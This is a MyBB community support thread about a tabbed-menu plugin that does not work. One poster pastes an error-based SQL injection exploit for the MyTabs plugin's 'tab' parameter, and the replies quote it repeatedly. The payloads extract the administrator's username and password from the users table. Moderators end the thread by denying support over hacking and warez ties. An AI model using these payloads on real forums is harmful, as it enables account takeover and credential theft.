MyBB Community Forums
Error Tabbed Menu V2.0.2 - Printable Version

+- MyBB Community Forums (https://community.mybb.com)
+-- Forum: 1.8 Support (https://community.mybb.com/forum-175.html)
+--- Forum: General Support (https://community.mybb.com/forum-176.html)
+--- Thread: Error Tabbed Menu V2.0.2 (/thread-174855.html)



Error Tabbed Menu V2.0.2 - Who.Is - 2015-08-17

I installed tabs 
[Image: 3Z53eiL.png]
But they are white not clickable and the tabs don't change anything.
I followed all the TEMPLATE TROUBLESHOOTING 
Methods but no help. I also have tabbed.ccs 
Still no help.
Can anyone tell me a solution or fix it for me thanks Heart





The Plugin I installed : http://www.mybbcentral.com/thread-7687.html

My website: http://www.zer0-days.com/


RE: Error Tabbed Menu V2.0.2 - ArneVD - 2015-08-17

This plugin is for MyBB 1.6.x, please install a plugin for 1.8.x to prevent these errors...
Plugin 1.8.x version: http://community.mybb.com/mods.php?action=view&pid=456

Otherwise,
Try changing the CSS and code.


RE: Error Tabbed Menu V2.0.2 - Who.Is - 2015-08-17

(2015-08-17, 11:03 PM)ArneVD Wrote: This plugin is for MyBB 1.6.x, please install a plugin for 1.8.x to prevent these errors...
Plugin 1.8.x version: http://community.mybb.com/mods.php?action=view&pid=456

Otherwise,
Try changing the CSS and code.

Sr. are you joking or you didn't read right? 
You have not provided me the same plugin MyTabs and Tabbed Menu are not the same.
Also there is an exploit for MyTabs.
Vulnerability :
 
$~ http://localhost/mybbpath/index.php?tab=[SQLi]
 
---------------------------------------
#           ~ Expl0itation ~            #
---------------------------------------
 
$~ Get the administrator's username (usually it has uid=1) ~
 
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
 
$~ Get the administrator's password ~
 
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -



RE: Error Tabbed Menu V2.0.2 - ArneVD - 2015-08-17

(2015-08-17, 11:14 PM)Who.Is Wrote:
(2015-08-17, 11:03 PM)ArneVD Wrote: This plugin is for MyBB 1.6.x, please install a plugin for 1.8.x to prevent these errors...
Plugin 1.8.x version: http://community.mybb.com/mods.php?action=view&pid=456

Otherwise,
Try changing the CSS and code.

Sr. are you joking or you didn't read right? 
You have not provided me the same plugin MyTabs and Tabbed Menu are not the same.
Also there is an exploit for MyTabs.
Vulnerability :
 
$~ http://localhost/mybbpath/index.php?tab=[SQLi]
 
---------------------------------------
#           ~ Expl0itation ~            #
---------------------------------------
 
$~ Get the administrator's username (usually it has uid=1) ~
 
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
 
$~ Get the administrator's password ~
 
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -

My problem,

Then the problem is that this plugin is made for 1.6.x versions, you must 'rebuild' this plugin to the 1.8.x versions of MyBB.


RE: Error Tabbed Menu V2.0.2 - Who.Is - 2015-08-17

(2015-08-17, 11:18 PM)ArneVD Wrote:
(2015-08-17, 11:14 PM)Who.Is Wrote:
(2015-08-17, 11:03 PM)ArneVD Wrote: This plugin is for MyBB 1.6.x, please install a plugin for 1.8.x to prevent these errors...
Plugin 1.8.x version: http://community.mybb.com/mods.php?action=view&pid=456

Otherwise,
Try changing the CSS and code.

Sr. are you joking or you didn't read right? 
You have not provided me the same plugin MyTabs and Tabbed Menu are not the same.
Also there is an exploit for MyTabs.
Vulnerability :
 
$~ http://localhost/mybbpath/index.php?tab=[SQLi]
 
---------------------------------------
#           ~ Expl0itation ~            #
---------------------------------------
 
$~ Get the administrator's username (usually it has uid=1) ~
 
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
 
$~ Get the administrator's password ~
 
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -

My problem,

Then the problem is that this plugin is made for 1.6.x versions, you must 'rebuild' this plugin to the 1.8.x versions of MyBB.
How? Sorry am new so kinda don't know allot.


RE: Error Tabbed Menu V2.0.2 - ArneVD - 2015-08-17

(2015-08-17, 11:23 PM)Who.Is Wrote:
(2015-08-17, 11:18 PM)ArneVD Wrote:
(2015-08-17, 11:14 PM)Who.Is Wrote:
(2015-08-17, 11:03 PM)ArneVD Wrote: This plugin is for MyBB 1.6.x, please install a plugin for 1.8.x to prevent these errors...
Plugin 1.8.x version: http://community.mybb.com/mods.php?action=view&pid=456

Otherwise,
Try changing the CSS and code.

Sr. are you joking or you didn't read right? 
You have not provided me the same plugin MyTabs and Tabbed Menu are not the same.
Also there is an exploit for MyTabs.
Vulnerability :
 
$~ http://localhost/mybbpath/index.php?tab=[SQLi]
 
---------------------------------------
#           ~ Expl0itation ~            #
---------------------------------------
 
$~ Get the administrator's username (usually it has uid=1) ~
 
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
 
$~ Get the administrator's password ~
 
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -

My problem,

Then the problem is that this plugin is made for 1.6.x versions, you must 'rebuild' this plugin to the 1.8.x versions of MyBB.
How? Sorry am new so kinda don't know allot.

Do you have any experience with HTML, CSS Jquery and PHP?


RE: Error Tabbed Menu V2.0.2 - Who.Is - 2015-08-17

(2015-08-17, 11:24 PM)ArneVD Wrote:
(2015-08-17, 11:23 PM)Who.Is Wrote:
(2015-08-17, 11:18 PM)ArneVD Wrote:
(2015-08-17, 11:14 PM)Who.Is Wrote:
(2015-08-17, 11:03 PM)ArneVD Wrote: This plugin is for MyBB 1.6.x, please install a plugin for 1.8.x to prevent these errors...
Plugin 1.8.x version: http://community.mybb.com/mods.php?action=view&pid=456

Otherwise,
Try changing the CSS and code.

Sr. are you joking or you didn't read right? 
You have not provided me the same plugin MyTabs and Tabbed Menu are not the same.
Also there is an exploit for MyTabs.
Vulnerability :
 
$~ http://localhost/mybbpath/index.php?tab=[SQLi]
 
---------------------------------------
#           ~ Expl0itation ~            #
---------------------------------------
 
$~ Get the administrator's username (usually it has uid=1) ~
 
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
 
$~ Get the administrator's password ~
 
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -

My problem,

Then the problem is that this plugin is made for 1.6.x versions, you must 'rebuild' this plugin to the 1.8.x versions of MyBB.
How? Sorry am new so kinda don't know allot.

Do you have any experience with HTML, CSS Jquery and PHP?

A little bit I can say if deface page coding counts.


RE: Error Tabbed Menu V2.0.2 - ArneVD - 2015-08-17

I recommend you to search for someone who will upgrade your plugin for free, because without propre knowledge of PHP a.o. it's not smart to edit the plugins code.

-Arne.


RE: Error Tabbed Menu V2.0.2 - Johnny S - 2015-08-18

So you are using my clients ripped theme (FK) and a nulled version of Tabbed menu plugin and still you are asking for help on this forums ?


Error Tabbed Menu V2.0.2 - .m. - 2015-08-18

@Who.Is , support denied as your forum is related to hacking & warez - please post in Private Inquiries section if you have anything to say

[support eligibility policy]